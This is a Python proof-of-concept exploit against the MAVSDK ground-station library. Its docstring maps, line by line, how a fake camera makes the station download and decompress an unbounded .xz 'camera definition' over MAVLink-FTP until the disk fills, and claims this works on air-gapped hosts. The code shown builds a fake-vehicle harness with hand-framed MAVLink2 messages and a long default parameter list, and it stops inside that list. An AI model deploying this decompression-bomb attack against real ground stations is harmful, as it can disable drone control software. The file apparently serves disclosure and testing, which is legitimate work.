"""
poc_MAVSDK03_camera_definition_bomb.py

MAVSDK-03 -- a malicious camera makes a MAVSDK-based ground station decompress an
unbounded amount of data onto its own disk, over the telemetry link.

TARGET   MAVSDK v3.17.4, shipped release artifact
         libmavsdk-dev_3.17.4_debian12_arm64.deb

THE CHAIN (line numbers from the v3.17.4 tag)

  camera_impl.cpp:78    CameraImpl subscribes process_heartbeat
  camera_impl.cpp:1008  process_heartbeat(): ANY heartbeat from a component id it has
                        not seen becomes a "potential camera". There is no component-id
                        filter at all -- unlike QGroundControl, which restricts this to
                        MAV_COMP_ID_CAMERA..CAMERA6 (100-105).
  camera_impl.cpp:1028  -> request_camera_information(compid). MAVSDK asks by itself;
                        the application never requests anything.
  camera_impl.cpp:1305  potential_camera->camera_definition_url = cam_definition_uri
                        (attacker-controlled, char[140] on the wire)
  camera_impl.cpp:1429  mftp:// -> mavlink_ftp_client().download_async(...)
  camera_impl.cpp:1477  if (downloaded_filepath.extension() == ".xz")
  camera_impl.cpp:1480  -> InflateLZMA::inflateLZMAFile(...)

  inflate_lzma.cpp:49   lzma_stream_decoder(strm, UINT64_MAX, LZMA_CONCATENATED)
                        UINT64_MAX is the MEMORY LIMIT -- i.e. none. Copied from
                        liblzma's example, including its comment saying so.
  inflate_lzma.cpp:110  while (true) { ... }
  inflate_lzma.cpp:143  fwrite(outbuf, 1, write_size, outfile)
                        No running total, no ceiling: the output size is whatever the
                        attacker's stream decodes to.

WHAT WAS MEASURED (harness-independent, see the finding write-up)
  156,316 bytes of .xz  ->  1,073,741,824 bytes written   (ratio 1:6869)
  Peak RSS stays ~65 MiB, so this is a DISK exhaustion primitive, not a memory one.
  A file declaring a huge dictionary does NOT cause a large allocation -- that was
  checked and is explicitly NOT claimed.

DELIVERY
  Everything travels over MAVLink-FTP. No HTTP, no DNS, no internet access on the
  victim host is required, so this works against an air-gapped ground station.
  1 GiB of output costs ~656 FTP messages (~156 KB) on the wire.

MODES
  control  serve a normal, uncompressed camera definition -- the app works fine
  bomb     serve the same definition as .xz -- disk fills

BENIGN: the decompressed output is zeros written to the app's own temp directory.
Nothing is executed and nothing outside that directory is touched. Delete the temp
directory afterwards. Authorized bench use only.
"""
import argparse
import os
import struct
import sys

os.environ["MAVLINK20"] = "1"   # force MAVLink 2 -- QGC Daily hard-rejects v1 traffic
                                 # ("MAVLink v1 traffic detected...only supports MAVLink v2")
                                 # and pymavlink defaults to v1 framing unless this is set
                                 # before pymavlink is imported (matches MP-01/G02).

# ============================================================================
# Embedded fake-vehicle harness — this PoC is SELF-CONTAINED (no external
# import, no separate harness file). Defines FakeVehicle, banner, observe,
# warn, ok, attack (+ wire helpers).
# ============================================================================
import argparse
import socket
import struct
import sys
import threading
import time

from pymavlink import mavutil
from pymavlink.mavutil import x25crc

# ---------------------------------------------------------------------------
# pretty output
# ---------------------------------------------------------------------------
_C = {"hdr": "\033[1;36m", "obs": "\033[0;37m", "warn": "\033[1;33m",
      "ok": "\033[1;32m", "atk": "\033[1;31m", "rst": "\033[0m"}


def banner(title):
    line = "=" * max(8, min(78, len(title) + 4))
    print("%s%s\n  %s\n%s%s" % (_C["hdr"], line, title, line, _C["rst"]))


def observe(msg): print("%s[obs]%s %s" % (_C["obs"], _C["rst"], msg))
def warn(msg):    print("%s[!]  %s%s"  % (_C["warn"], msg, _C["rst"]))
def ok(msg):      print("%s[ok] %s%s"  % (_C["ok"], msg, _C["rst"]))
def attack(msg):  print("%s[atk]%s %s" % (_C["atk"], _C["rst"], msg))


# ===========================================================================
# Raw MAVLink2 framing for messages that the locally-installed pymavlink dialect
# does NOT know (COMPONENT_INFORMATION id=395, COMPONENT_METADATA id=397).
# A malicious vehicle frames these by hand; a real GCS validates the CRC using
# the per-message CRC_EXTRA, so we compute CRC_EXTRA exactly the way the MAVLink
# generator (mavgen) does and verify it against a known message in the unit check
# at the bottom of this file.
# ===========================================================================
_TYPE_SIZE = {
    "uint8_t": 1, "int8_t": 1, "char": 1, "uint16_t": 2, "int16_t": 2,
    "uint32_t": 4, "int32_t": 4, "float": 4, "uint64_t": 8, "int64_t": 8,
    "double": 8, "uint8_t_mavlink_version": 1,
}


def _crc_extra(name, fields):
    """Replicate mavgen's CRC_EXTRA: x25 over 'NAME ' then, in WIRE order
    (stable sort by descending type size), 'TYPE ' 'FNAME ' and, for arrays,
    one length byte. Extension fields (after <extensions/>) are NOT included.

    fields: list of (type, name, array_len_or_0)  in XML declaration order,
            excluding any extension fields.
    """
    ordered = sorted(fields, key=lambda f: -_TYPE_SIZE[f[0]])  # stable -> ties keep order
    crc = x25crc()
    crc.accumulate_str(name + " ")
    for ftype, fname, alen in ordered:
        t = "uint8_t" if ftype == "uint8_t_mavlink_version" else ftype
        crc.accumulate_str(t + " ")
        crc.accumulate_str(fname + " ")
        if alen > 0:
            crc.accumulate(bytes([alen]))
    return (crc.crc & 0xFF) ^ (crc.crc >> 8)


def _wire_payload(fields, values):
    """Pack a payload in WIRE order (descending type size, stable), truncating
    trailing zero bytes the way MAVLink2 does. `values` is a dict name->python value."""
    ordered = sorted(range(len(fields)), key=lambda i: -_TYPE_SIZE[fields[i][0]])
    fmt = "<"
    packed = b""
    for i in ordered:
        ftype, fname, alen = fields[i]
        v = values[fname]
        if alen > 0 and ftype in ("char", "uint8_t", "int8_t"):
            if isinstance(v, str):
                v = v.encode("utf-8", "replace")
            v = (v + b"\x00" * alen)[:alen]
            packed += v
        elif alen > 0:
            raise NotImplementedError("non-byte arrays not needed here")
        else:
            packed += struct.pack({"uint32_t": "<I", "int32_t": "<i", "uint16_t": "<H",
                                   "int16_t": "<h", "uint8_t": "<B", "int8_t": "<b",
                                   "float": "<f"}[ftype], v)
    return packed


# Field definitions (declaration order, no extension fields) for the two messages
# the dialect lacks. Verified against c_library_v2 headers:
#   COMPONENT_METADATA(397)   CRC_EXTRA = 182
#   COMPONENT_INFORMATION(395) CRC_EXTRA = 0
_MSG_COMPONENT_METADATA = (
    397, "COMPONENT_METADATA",
    [("uint32_t", "time_boot_ms", 0),
     ("uint32_t", "file_crc", 0),
     ("char", "uri", 100)],
)
_MSG_COMPONENT_INFORMATION = (
    395, "COMPONENT_INFORMATION",
    [("uint32_t", "time_boot_ms", 0),
     ("uint32_t", "general_metadata_file_crc", 0),
     ("uint32_t", "peripherals_metadata_file_crc", 0),
     ("char", "general_metadata_uri", 100),
     ("char", "peripherals_metadata_uri", 100)],
)


# ===========================================================================
# FakeVehicle
# ===========================================================================
# Real ArduCopter 4.7.0 default parameter dump (name, default value), extracted
# verbatim from QGroundControl's own offline-editing reference at
# src/FirmwarePlugin/APM/Copter.OfflineEditing.params. Shipping the REAL default
# set (instead of a hand-picked subset) is what actually stops QGC's per-page
# "missing parameter" checks (FactPanelController::getParameterFact) for good --
# those checks fire the instant any setup page asks for a name we never sent,
# with no wire retry, so anticipating names one dialog at a time never converges.
_COPTER_DEFAULT_PARAMS_TSV = """
ACRO_BAL_PITCH 1
ACRO_BAL_ROLL 1
ACRO_OPTIONS 0
ACRO_RP_EXPO 0.30000001192092896
ACRO_RP_RATE 360
ACRO_RP_RATE_TC 0
ACRO_THR_MID 0
ACRO_TRAINER 2
ACRO_Y_EXPO 0
ACRO_Y_RATE 202.5
ACRO_Y_RATE_TC 0
ADSB_TYPE 0
AHRS_COMP_BETA 0.10000000149011612
AHRS_EKF_TYPE 3
AHRS_GPS_GAIN 1
AHRS_GPS_MINSATS 6
AHRS_GPS_USE 1
AHRS_OPTIONS 0
AHRS_ORIENTATION 0
AHRS_ORIGIN_ALT 0
AHRS_ORIGIN_LAT 0
AHRS_ORIGIN_LON 0
AHRS_RP_P 0.20000000298023224
AHRS_TRIM_X 0
AHRS_TRIM_Y 0
AHRS_TRIM_Z 0
AHRS_WIND_MAX 0
AHRS_YAW_P 0.20000000298023224
ARMING_ACCTHRESH 0.75
ARMING_MAGTHRESH 100
ARMING_MIS_ITEMS 0
ARMING_NEED_LOC 0
ARMING_OPTIONS 0
ARMING_RUDDER 2
ARMING_SKIPCHK 0
ARSPD_ENABLE 0
ATC_ACC_P_MAX 1100
ATC_ACC_R_MAX 1100
ATC_ACC_Y_MAX 270
ATC_ANGLE_BOOST 1
ATC_ANGLE_MAX 30
ATC_ANG_LIM_TC 1
ATC_ANG_PIT_P 4.5
ATC_ANG_RLL_P 4.5
ATC_ANG_YAW_P 4.5
ATC_INPUT_TC 0.15000000596046448
ATC_LAND_P_MULT 1
ATC_LAND_R_MULT 1
ATC_LAND_Y_MULT 1
ATC_RATE_FF_ENAB 1
ATC_RATE_P_MAX 0
ATC_RATE_R_MAX 0
ATC_RATE_WPY_MAX 60
ATC_RATE_Y_MAX 0
ATC_RAT_PIT_D 0.003599999938160181
ATC_RAT_PIT_D_FF 0
ATC_RAT_PIT_FF 0
ATC_RAT_PIT_FLTD 20
ATC_RAT_PIT_FLTE 0
ATC_RAT_PIT_FLTT 20
ATC_RAT_PIT_I 0.13500000536441803
ATC_RAT_PIT_IMAX 0.5
ATC_RAT_PIT_NEF 0
ATC_RAT_PIT_NTF 0
ATC_RAT_PIT_P 0.13500000536441803
ATC_RAT_PIT_PDMX 0
ATC_RAT_PIT_SMAX 0
ATC_RAT_RLL_D 0.003599999938160181
ATC_RAT_RLL_D_FF 0
ATC_RAT_RLL_FF 0
ATC_RAT_RLL_FLTD 20
ATC_RAT_RLL_FLTE 0
ATC_RAT_RLL_FLTT 20
ATC_RAT_RLL_I 0.13500000536441803
ATC_RAT_RLL_IMAX 0.5
ATC_RAT_RLL_NEF 0
ATC_RAT_RLL_NTF 0
ATC_RAT_RLL_P 0.13500000536441803
ATC_RAT_RLL_PDMX 0
ATC_RAT_RLL_SMAX 0
ATC_RAT_YAW_D 0
ATC_RAT_YAW_D_FF 0
ATC_RAT_YAW_FF 0
ATC_RAT_YAW_FLTD 20
ATC_RAT_YAW_FLTE 2.5
ATC_RAT_YAW_FLTT 20
ATC_RAT_YAW_I 0.019999999552965164
ATC_RAT_YAW_IMAX 0.5
ATC_RAT_YAW_NEF 0
ATC_RAT_YAW_NTF 0
ATC_RAT_YAW_P 0.30000001192092896
ATC_RAT_YAW_PDMX 0
ATC_RAT_YAW_SMAX 0
ATC_THR_G_BOOST 0
ATC_THR_MIX_MAN 0.10000000149011612
ATC_THR_MIX_MAX 0.5
ATC_THR_MIX_MIN 0.10000000149011612
AUTOTUNE_AGGR 0.07500000298023224
AUTOTUNE_AXES 7
AUTOTUNE_GMBK 0.25
AUTOTUNE_MIN_D 0.000500000023748726
AUTO_OPTIONS 0
AVD_ENABLE 0
AVOID_ACCEL_MAX 3
AVOID_ALT_MIN 0
AVOID_BACKUP_DZ 0.10000000149011612
AVOID_BACKUP_SPD 0.75
AVOID_BACKZ_SPD 0.75
AVOID_BEHAVE 0
AVOID_DIST_MAX 5
AVOID_ENABLE 3
AVOID_MARGIN 2
BARO1_DEVID 65540
BARO1_GND_PRESS 94502.828125
BARO1_WCF_ENABLE 0
BARO2_DEVID 65796
BARO2_GND_PRESS 94504.359375
BARO2_WCF_ENABLE 0
BARO3_DEVID 0
BARO3_GND_PRESS 0
BARO3_WCF_ENABLE 0
BARO_ALTERR_MAX 2000
BARO_ALT_OFFSET 0
BARO_EXT_BUS -1
BARO_FIELD_ELV 0
BARO_FLTR_RNG 0
BARO_GND_TEMP 0
BARO_OPTIONS 0
BARO_PRIMARY 0
BARO_PROBE_EXT 0
BATT2_AMP_OFFSET 0
BATT2_AMP_PERVLT 17
BATT2_ARM_MAH 0
BATT2_ARM_VOLT 0
BATT2_CAPACITY 3300
BATT2_CRT_MAH 0
BATT2_CRT_VOLT 0
BATT2_CURR_PIN 12
BATT2_FS_CRT_ACT 0
BATT2_FS_LOW_ACT 0
BATT2_FS_VOLTSRC 0
BATT2_LOW_MAH 0
BATT2_LOW_TIMER 10
BATT2_LOW_VOLT 10.5
BATT2_MONITOR 4
BATT2_OPTIONS 0
BATT2_SERIAL_NUM -1
BATT2_VLT_OFFSET 0
BATT2_VOLT_MULT 10.100000381469727
BATT2_VOLT_PIN 13
BATT3_MONITOR 0
BATT4_MONITOR 0
BATT5_MONITOR 0
BATT6_MONITOR 0
BATT7_MONITOR 0
BATT8_MONITOR 0
BATT9_MONITOR 0
BATT_AMP_OFFSET 0
BATT_AMP_PERVLT 17
BATT_ARM_MAH 0
BATT_ARM_VOLT 0
BATT_CAPACITY 3300
BATT_CRT_MAH 0
BATT_CRT_VOLT 0
BATT_CURR_PIN 12
BATT_FS_CRT_ACT 0
BATT_FS_LOW_ACT 0
BATT_FS_VOLTSRC 0
BATT_LOW_MAH 0
BATT_LOW_TIMER 10
BATT_LOW_VOLT 10.5
BATT_MONITOR 4
BATT_OPTIONS 0
BATT_SERIAL_NUM -1
BATT_VLT_OFFSET 0
BATT_VOLT_MULT 10.100000381469727
BATT_VOLT_PIN 13
BCN_TYPE 0
BRD_BOOT_DELAY 0
BRD_OPTIONS 0
BRD_RTC_TYPES 1
BRD_RTC_TZ_MIN 0
BRD_SAFETYOPTION 3
BRD_SAFETY_DEFLT 0
BRD_SAFETY_MASK 16368
BRD_SD_FENCE 0
BRD_SD_MISSION 0
BRD_SERIAL_NUM 0
BRD_VBUS_MIN 4.300000190734863
BRD_VSERVO_MIN 0
BTN_ENABLE 0
CAM1_TYPE 0
CAM2_TYPE 0
CAM_AUTO_ONLY 0
CAM_MAX_ROLL 0
CAN_D1_PROTOCOL 1
CAN_D1_PROTOCOL2 0
CAN_D2_PROTOCOL 1
CAN_D2_PROTOCOL2 0
CAN_LOGLEVEL 0
CAN_P1_DRIVER 0
CAN_P2_DRIVER 0
CC_TYPE 0
CHUTE_ENABLED 0
CIRCLE_OPTIONS 1
CIRCLE_RADIUS_M 10
CIRCLE_RATE 20
COMPASS_AUTODEC 1
COMPASS_AUTO_ROT 2
COMPASS_CAL_FIT 16
COMPASS_DEC 0
COMPASS_DEV_ID 97539
COMPASS_DEV_ID2 131874
COMPASS_DEV_ID3 263178
COMPASS_DEV_ID4 97283
COMPASS_DEV_ID5 97795
COMPASS_DEV_ID6 98051
COMPASS_DEV_ID7 0
COMPASS_DEV_ID8 0
COMPASS_DIA2_X 1
COMPASS_DIA2_Y 1
COMPASS_DIA2_Z 1
COMPASS_DIA3_X 1
COMPASS_DIA3_Y 1
COMPASS_DIA3_Z 1
COMPASS_DIA_X 1
COMPASS_DIA_Y 1
COMPASS_DIA_Z 1
COMPASS_DISBLMSK 0
COMPASS_ENABLE 1
COMPASS_EXTERN2 0
COMPASS_EXTERN3 0
COMPASS_EXTERNAL 1
COMPASS_FLTR_RNG 0
COMPASS_LEARN 0
COMPASS_MOT2_X 0
COMPASS_MOT2_Y 0
COMPASS_MOT2_Z 0
COMPASS_MOT3_X 0
COMPASS_MOT3_Y 0
COMPASS_MOT3_Z 0
COMPASS_MOTCT 0
COMPASS_MOT_X 0
COMPASS_MOT_Y 0
COMPASS_MOT_Z 0
COMPASS_ODI2_X 0
COMPASS_ODI2_Y 0
COMPASS_ODI2_Z 0
COMPASS_ODI3_X 0
COMPASS_ODI3_Y 0
COMPASS_ODI3_Z 0
COMPASS_ODI_X 0
COMPASS_ODI_Y 0
COMPASS_ODI_Z 0
COMPASS_OFFS_MAX 1800
COMPASS_OFS2_X 5
COMPASS_OFS2_Y 13
COMPASS_OFS2_Z -18
COMPASS_OFS3_X 5
COMPASS_OFS3_Y 13
COMPASS_OFS3_Z -18
COMPASS_OFS_X 5
COMPASS_OFS_Y 13
COMPASS_OFS_Z -18
COMPASS_OPTIONS 0
COMPASS_ORIENT 0
COMPASS_ORIENT2 0
COMPASS_ORIENT3 0
COMPASS_PMOT_EN 0
COMPASS_PRIO1_ID 97539
COMPASS_PRIO2_ID 131874
COMPASS_PRIO3_ID 263178
COMPASS_SCALE 1
COMPASS_SCALE2 1
COMPASS_SCALE3 1
COMPASS_USE 1
COMPASS_USE2 1
COMPASS_USE3 1
CUST_ROT_ENABLE 0
DEV_OPTIONS 0
DID_ENABLE 0
DISARM_DELAY 10
EAHRS_TYPE 0
EFI_TYPE 0
EK2_ENABLE 0
EK3_ABIAS_P_NSE 0.019999999552965164
EK3_ACC_BIAS_LIM 1
EK3_ACC_P_NSE 0.3499999940395355
EK3_AFFINITY 0
EK3_ALT_M_NSE 2
EK3_BCN_DELAY 50
EK3_BCN_I_GTE 500
EK3_BCN_M_NSE 1
EK3_BETA_MASK 0
EK3_CHECK_SCALE 100
EK3_DRAG_BCOEF_X 0
EK3_DRAG_BCOEF_Y 0
EK3_DRAG_MCOEF 0
EK3_DRAG_M_NSE 0.5
EK3_EAS_I_GATE 400
EK3_EAS_M_NSE 1.399999976158142
EK3_ENABLE 1
EK3_ERR_THRESH 0.20000000298023224
EK3_FLOW_DELAY 10
EK3_FLOW_I_GATE 300
EK3_FLOW_MAX 2.5
EK3_FLOW_M_NSE 0.25
EK3_FLOW_USE 1
EK3_GBIAS_P_NSE 0.001000000047497451
EK3_GLITCH_RAD 25
EK3_GND_EFF_DZ 4
EK3_GPS_CHECK 31
EK3_GPS_VACC_MAX 0
EK3_GSF_RST_MAX 2
EK3_GSF_RUN_MASK 3
EK3_GSF_USE_MASK 3
EK3_GYRO_P_NSE 0.014999999664723873
EK3_HGT_DELAY 60
EK3_HGT_I_GATE 500
EK3_HRT_FILT 2
EK3_IMU_MASK 3
EK3_LOG_LEVEL 0
EK3_MAGB_P_NSE 9.9999997473788e-05
EK3_MAGE_P_NSE 0.001000000047497451
EK3_MAG_CAL 3
EK3_MAG_EF_LIM 50
EK3_MAG_I_GATE 300
EK3_MAG_MASK 0
EK3_MAG_M_NSE 0.05000000074505806
EK3_NOAID_M_NSE 10
EK3_OGNM_TEST_SF 2
EK3_OGN_HGT_MASK 0
EK3_OPTIONS 0
EK3_POSNE_M_NSE 0.5
EK3_POS_I_GATE 500
EK3_PRIMARY 0
EK3_RNG_I_GATE 500
EK3_RNG_M_NSE 0.5
EK3_RNG_USE_HGT -1
EK3_RNG_USE_SPD 2
EK3_SRC1_POSXY 3
EK3_SRC1_POSZ 1
EK3_SRC1_VELXY 3
EK3_SRC1_VELZ 3
EK3_SRC1_YAW 1
EK3_SRC2_POSXY 0
EK3_SRC2_POSZ 1
EK3_SRC2_VELXY 0
EK3_SRC2_VELZ 0
EK3_SRC2_YAW 0
EK3_SRC3_POSXY 0
EK3_SRC3_POSZ 1
EK3_SRC3_VELXY 0
EK3_SRC3_VELZ 0
EK3_SRC3_YAW 0
EK3_SRC_OPTIONS 0
EK3_TAU_OUTPUT 25
EK3_TERR_GRAD 0.10000000149011612
EK3_VELD_M_NSE 0.5
EK3_VELNE_M_NSE 0.30000001192092896
EK3_VEL_I_GATE 500
EK3_VIS_VERR_MAX 0.8999999761581421
EK3_VIS_VERR_MIN 0.10000000149011612
EK3_WENC_VERR 0.10000000149011612
EK3_WIND_PSCALE 1
EK3_WIND_P_NSE 0.20000000298023224
EK3_YAW_I_GATE 300
EK3_YAW_M_NSE 0.5
ESC_CALIBRATION 0
ESC_TLM_MAV_OFS 0
FENCE_ACTION 1
FENCE_ALT_MAX 100
FENCE_ALT_MIN -10
FENCE_AUTOENABLE 0
FENCE_ENABLE 0
FENCE_MARGIN 2
FENCE_MARGIN_XY 0
FENCE_NTF_FREQ 1
FENCE_OPTIONS 0
FENCE_RADIUS 150
FENCE_TOTAL 0
FENCE_TYPE 7
FFT_ENABLE 0
FHLD_BRAKE_RATE 8
FHLD_FILT_HZ 5
FHLD_FLOW_MAX 0.6000000238418579
FHLD_QUAL_MIN 10
FHLD_XY_FILT_HZ 5
FHLD_XY_I 0.30000001192092896
FHLD_XY_IMAX 3000
FHLD_XY_P 0.20000000298023224
FILT1_TYPE 0
FILT2_TYPE 0
FILT3_TYPE 0
FILT4_TYPE 0
FILT5_TYPE 0
FILT6_TYPE 0
FILT7_TYPE 0
FILT8_TYPE 0
FLIGHT_OPTIONS 0
FLOW_TYPE 0
FLTMODE1 7
FLTMODE2 9
FLTMODE3 6
FLTMODE4 3
FLTMODE5 5
FLTMODE6 0
FLTMODE_CH 5
FLTMODE_GCSBLOCK 0
FOLL_ENABLE 0
FORMAT_VERSION 120
FRAME_CLASS 1
FRAME_TYPE 0
FRSKY_DNLINK1_ID 20
FRSKY_DNLINK2_ID 7
FRSKY_DNLINK_ID 27
FRSKY_OPTIONS 0
FRSKY_UPLINK_ID 13
FSTRATE_DIV 1
FSTRATE_ENABLE 0
FS_CRASH_CHECK 1
FS_DR_ENABLE 2
FS_DR_TIMEOUT 30
FS_EKF_ACTION 1
FS_EKF_FILT 5
FS_EKF_THRESH 0.800000011920929
FS_GCS_ENABLE 0
FS_GCS_TIMEOUT 5
FS_OPTIONS 16
FS_THR_ENABLE 1
FS_THR_VALUE 975
FS_VIBE_ENABLE 1
GCS_PID_MASK 0
GEN_TYPE 0
GND_EFFECT_COMP 1
GPS1_CAN_NODEID 0
GPS1_CAN_OVRIDE 0
GPS1_COM_PORT 1
GPS1_DELAY_MS 0
GPS1_GNSS_MODE 0
GPS1_MB_TYPE 0
GPS1_POS_X 0
GPS1_POS_Y 0
GPS1_POS_Z 0
GPS1_RATE_MS 200
GPS1_TYPE 1
GPS2_TYPE 0
GPS_AUTO_CONFIG 1
GPS_AUTO_SWITCH 1
GPS_BLEND_MASK 5
GPS_DRV_OPTIONS 0
GPS_HDOP_GOOD 140
GPS_INJECT_TO 127
GPS_MIN_ELEV -100
GPS_NAVFILTER 8
GPS_PRIMARY 0
GPS_RAW_DATA 0
GPS_SAVE_CFG 2
GPS_SBAS_MODE 2
GPS_SBP_LOGMASK -256
GRIP_ENABLE 0
GUID_OPTIONS 0
GUID_TIMEOUT 3
INITIAL_MODE 0
INS_ACC1_CALTEMP -300
INS_ACC2OFFS_X 0.001000000047497451
INS_ACC2OFFS_Y 0.001000000047497451
INS_ACC2OFFS_Z 0.001000000047497451
INS_ACC2SCAL_X 1.0010000467300415
INS_ACC2SCAL_Y 1.0010000467300415
INS_ACC2SCAL_Z 1.0010000467300415
INS_ACC2_CALTEMP -300
INS_ACC2_ID 0
INS_ACC3OFFS_X 0
INS_ACC3OFFS_Y 0
INS_ACC3OFFS_Z 0
INS_ACC3SCAL_X 1
INS_ACC3SCAL_Y 1
INS_ACC3SCAL_Z 1
INS_ACC3_CALTEMP -300
INS_ACC3_ID 0
INS_ACCEL_FILTER 20
INS_ACCOFFS_X 0.001000000047497451
INS_ACCOFFS_Y 0.001000000047497451
INS_ACCOFFS_Z 0.001000000047497451
INS_ACCSCAL_X 1.0010000467300415
INS_ACCSCAL_Y 1.0010000467300415
INS_ACCSCAL_Z 1.0010000467300415
INS_ACC_BODYFIX 2
INS_ACC_ID 0
INS_ENABLE_MASK 127
INS_FAST_SAMPLE 1
INS_GYR1_CALTEMP -300
INS_GYR2OFFS_X 0
INS_GYR2OFFS_Y 0
INS_GYR2OFFS_Z 0
INS_GYR2_CALTEMP -300
INS_GYR2_ID 0
INS_GYR3OFFS_X 0
INS_GYR3OFFS_Y 0
INS_GYR3OFFS_Z 0
INS_GYR3_CALTEMP -300
INS_GYR3_ID 0
INS_GYROFFS_X 0
INS_GYROFFS_Y 0
INS_GYROFFS_Z 0
INS_GYRO_FILTER 20
INS_GYRO_RATE 0
INS_GYR_CAL 1
INS_GYR_ID 0
INS_HNTC2_ENABLE 0
INS_HNTC3_ENABLE 0
INS_HNTCH_ENABLE 0
INS_LOG_BAT_CNT 1024
INS_LOG_BAT_LGCT 32
INS_LOG_BAT_LGIN 20
INS_LOG_BAT_MASK 0
INS_LOG_BAT_OPT 0
INS_POS1_X 0
INS_POS1_Y 0
INS_POS1_Z 0
INS_POS2_X 0
INS_POS2_Y 0
INS_POS2_Z 0
INS_POS3_X 0
INS_POS3_Y 0
INS_POS3_Z 0
INS_RAW_LOG_OPT 0
INS_STILL_THRESH 2.5
INS_TCAL1_ENABLE 0
INS_TCAL2_ENABLE 0
INS_TCAL3_ENABLE 0
INS_TCAL_OPTIONS 0
INS_TRIM_OPTION 1
INS_USE 1
INS_USE2 1
INS_USE3 1
KDE_NPOLE 14
LAND_ALT_LOW_M 10
LAND_REPOSITION 1
LAND_SPD_HIGH_MS 0
LAND_SPD_MS 0.5
LGR_ENABLE 0
LOG_BACKEND_TYPE 1
LOG_BITMASK 180222
LOG_BLK_RATEMAX 0
LOG_DARM_RATEMAX 0
LOG_DISARMED 0
LOG_FILE_BUFSIZE 200
LOG_FILE_DSRMROT 0
LOG_FILE_MB_FREE 500
LOG_FILE_RATEMAX 0
LOG_FILE_TIMEOUT 5
LOG_MAV_BUFSIZE 8
LOG_MAV_RATEMAX 0
LOG_MAX_FILES 500
LOG_REPLAY 0
LOIT_ACC_MAX_M 5
LOIT_ANG_MAX 0
LOIT_BRK_ACC_M 2.5
LOIT_BRK_DELAY 1
LOIT_BRK_JRK_M 5
LOIT_OPTIONS 1
LOIT_SPEED_MS 12.5
MAV1_ADSB 0
MAV1_EXTRA1 0
MAV1_EXTRA2 0
MAV1_EXTRA3 0
MAV1_EXT_STAT 0
MAV1_OPTIONS 0
MAV1_PARAMS 0
MAV1_POSITION 0
MAV1_RAW_CTRL 0
MAV1_RAW_SENS 0
MAV1_RC_CHAN 0
MAV2_ADSB 0
MAV2_EXTRA1 0
MAV2_EXTRA2 0
MAV2_EXTRA3 0
MAV2_EXT_STAT 0
MAV2_OPTIONS 0
MAV2_PARAMS 0
MAV2_POSITION 0
MAV2_RAW_CTRL 0
MAV2_RAW_SENS 0
MAV2_RC_CHAN 0
MAV3_ADSB 0
MAV3_EXTRA1 0
MAV3_EXTRA2 0
MAV3_EXTRA3 0
MAV3_EXT_STAT 0
MAV3_OPTIONS 0
MAV3_PARAMS 0
MAV3_POSITION 0
MAV3_RAW_CTRL 0
MAV3_RAW_SENS 0
MAV3_RC_CHAN 0
MAV_GCS_SYSID 255
MAV_GCS_SYSID_HI 0
MAV_OPTIONS 0
MAV_SYSID 1
MAV_TELEM_DELAY 0
MIS_OPTIONS 0
MIS_RESTART 0
MIS_TOTAL 0
MNT1_TYPE 0
MNT2_TYPE 0
MOT_BAT_CURR_MAX 0
MOT_BAT_CURR_TC 5
MOT_BAT_IDX 0
MOT_BAT_VOLT_MAX 12.800000190734863
MOT_BAT_VOLT_MIN 9.600000381469727
MOT_BOOST_SCALE 0
MOT_HOVER_LEARN 2
MOT_IDLE_SEC 0
MOT_OPTIONS 0
MOT_PWM_MAX 2000
MOT_PWM_MIN 1000
MOT_PWM_TYPE 0
MOT_SAFE_DISARM 0
MOT_SAFE_TIME 1
MOT_SLEW_DN_TIME 0
MOT_SLEW_UP_TIME 0
MOT_SPIN_ARM 0.10000000149011612
MOT_SPIN_MAX 0.949999988079071
MOT_SPIN_MIN 0.15000000596046448
MOT_SPOOL_TIME 0.5
MOT_SPOOL_TIM_DN 0
MOT_THST_EXPO 0.6499999761581421
MOT_THST_HOVER 0.38999998569488525
MOT_YAW_HEADROOM 200
MSP_OPTIONS 0
MSP_OSD_NCELLS 0
NET_ENABLE 0
NET_P1_TYPE 0
NET_P2_TYPE 0
NET_P3_TYPE 0
NET_P4_TYPE 0
NMEA_MSG_EN 3
NMEA_RATE_MS 100
NTF_BUZZ_ON_LVL 1
NTF_BUZZ_PIN -1
NTF_BUZZ_TYPES 5
NTF_BUZZ_VOLUME 100
NTF_DISPLAY_TYPE 0
NTF_LED_BRIGHT 3
NTF_LED_LEN 1
NTF_LED_OVERRIDE 0
NTF_LED_TYPES 123079
OA_TYPE 0
OSD_TYPE 0
PHLD_BRK_ANGLE 30
PHLD_BRK_RATE 8
PILOT_ACC_Z 2.5
PILOT_SPD_DN 0
PILOT_SPD_UP 2.5
PILOT_THR_BHV 0
PILOT_THR_FILT 0
PILOT_TKO_ALT_M 0
PILOT_Y_EXPO 0
PILOT_Y_RATE 202.5
PILOT_Y_RATE_TC 0
PLDP_DELAY 0
PLDP_RNG_MAX 0
PLDP_SPEED_DN 0
PLDP_THRESH 0.8999999761581421
PLND_ENABLED 0
PRX1_TYPE 0
PRX2_TYPE 0
PRX3_TYPE 0
PRX4_TYPE 0
PRX5_TYPE 0
PRX_ALT_MIN 1
PRX_FILT 0.25
PRX_IGN_GND 0
PRX_LOG_RAW 0
PSC_ANGLE_MAX 0
PSC_D_ACC_D 0
PSC_D_ACC_D_FF 0
PSC_D_ACC_FF 0
PSC_D_ACC_FLTD 0
PSC_D_ACC_FLTE 20
PSC_D_ACC_FLTT 0
PSC_D_ACC_I 0.10000000149011612
PSC_D_ACC_IMAX 0.800000011920929
PSC_D_ACC_NEF 0
PSC_D_ACC_NTF 0
PSC_D_ACC_P 0.05000000074505806
PSC_D_ACC_PDMX 0
PSC_D_ACC_SMAX 0
PSC_D_POS_P 1
PSC_D_VEL_D 0
PSC_D_VEL_FF 0
PSC_D_VEL_FLTD 5
PSC_D_VEL_FLTE 5
PSC_D_VEL_I 0
PSC_D_VEL_IMAX 10
PSC_D_VEL_P 5
PSC_JERK_D 5
PSC_JERK_NE 5
PSC_NE_POS_P 1
PSC_NE_VEL_D 0.25
PSC_NE_VEL_FF 0
PSC_NE_VEL_FLTD 5
PSC_NE_VEL_FLTE 5
PSC_NE_VEL_I 1
PSC_NE_VEL_IMAX 10
PSC_NE_VEL_P 2
RALLY_INCL_HOME 1
RALLY_LIMIT_KM 0.30000001192092896
RALLY_TOTAL 0
RC10_DZ 0
RC10_MAX 1900
RC10_MIN 1100
RC10_OPTION 0
RC10_REVERSED 0
RC10_TRIM 1500
RC11_DZ 0
RC11_MAX 1900
RC11_MIN 1100
RC11_OPTION 0
RC11_REVERSED 0
RC11_TRIM 1500
RC12_DZ 0
RC12_MAX 1900
RC12_MIN 1100
RC12_OPTION 0
RC12_REVERSED 0
